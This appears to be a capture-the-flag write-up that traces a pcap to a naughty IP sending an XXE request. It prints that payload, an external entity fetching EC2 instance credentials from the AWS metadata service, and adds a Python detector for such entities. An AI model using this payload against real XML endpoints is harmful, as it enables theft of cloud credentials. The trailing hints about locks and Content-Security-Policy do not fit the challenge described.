Naughty IP
Alabaster Snowball is standing in the very dark.
Challenge

Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Web Ring for hints.

Solution

Let's open up Wireshark again. We know from the earlier challenges that the source must be IP 18.222.86.32, and AWS IMDS lookups always go to the link-local address 169.254.169.254, so we build the following display filter:

ip.src_host == "18.222.86.32" and tcp.reassembled.data contains "169.254.169.254"

We select the last matching packet and right-click -> Follow -> HTTP Stream:

POST /proc HTTP/1.1
Host: www.toteslegit.us
...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"> ]>
<product><productId>&id;</productId></product>
HTTP/1.1 200 OK

So the URL fetched is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance.
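The same triage can be scripted once the POST bodies are exported from Wireshark. The script below is an added example (not part of this write-up or the Holiday Hack materials): it assumes the reassembled requests are available as (source IP, HTTP body) pairs, which it takes from a constructed sample, and it flags any source whose XML declares a SYSTEM entity whose host is the IMDS address. Parsing the entity URL rather than grepping for the raw string also catches other IMDS paths; the hypothetical 10.0.0.x addresses stand in for the nice traffic, and the naughty body is the one shown in the HTTP stream above.

```python
import re
from urllib.parse import urlsplit

# Link-local address of the AWS instance metadata service (IMDS).
IMDS_HOST = "169.254.169.254"

# Matches an external entity declaration inside a DOCTYPE, e.g.
#   <!ENTITY id SYSTEM "http://...">
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<name>[\w.-]+)\s+SYSTEM\s+(?P<q>["\'])(?P<url>.*?)(?P=q)',
    re.IGNORECASE | re.DOTALL,
)


def external_entities(body):
    """Return [(entity_name, url), ...] for every SYSTEM entity in an XML body."""
    return [(m.group("name"), m.group("url")) for m in ENTITY_RE.finditer(body)]


def points_at_imds(url):
    """True if the entity URL resolves to the metadata service host."""
    try:
        return urlsplit(url).hostname == IMDS_HOST
    except ValueError:  # malformed URL (e.g. bad IPv6 literal)
        return False


def find_naughty_ips(requests):
    """requests: iterable of (src_ip, http_body).

    Returns {src_ip: [imds_url, ...]} for every source that sent an
    XML body with an external entity aimed at the metadata service.
    """
    hits = {}
    for src_ip, body in requests:
        for _name, url in external_entities(body):
            if points_at_imds(url):
                hits.setdefault(src_ip, []).append(url)
    return hits


# Constructed sample of reassembled POST /proc bodies keyed by source IP.
# The 10.0.0.x addresses are hypothetical nice traffic; the naughty body
# is the one seen in the followed HTTP stream.
XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://169.254.169.254/latest/meta-data/'
    'identity-credentials/ec2/security-credentials/ec2-instance"> ]>\n'
    '<product><productId>&id;</productId></product>'
)
SAMPLE_REQUESTS = [
    ("10.0.0.5", '<?xml version="1.0"?><product><productId>1234</productId></product>'),
    # An internal (non-SYSTEM) entity is harmless and must not be flagged.
    ("10.0.0.7", '<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY co "Boria Mines"> ]>'
                 '<product><productId>&co;</productId></product>'),
    ("18.222.86.32", XXE_BODY),
    ("10.0.0.9", '<?xml version="1.0"?><product><productId>5678</productId></product>'),
]

if __name__ == "__main__":
    for ip, urls in find_naughty_ips(SAMPLE_REQUESTS).items():
        print(ip, "->", *urls)
```

Run as-is it prints the single naughty source and the IMDS URL it tried to pull; feed it real bodies exported from Wireshark (File -> Export Objects -> HTTP, or a tshark dump of tcp.reassembled.data) to do the same over a whole capture.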

We get the following hints:

Lock Mechanism

The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.

Content-Security-Policy

Understanding how Content-Security-Policy works can help with this challenge.

Input Validation

Developers use both client- and server-side input validation to keep out naughty input.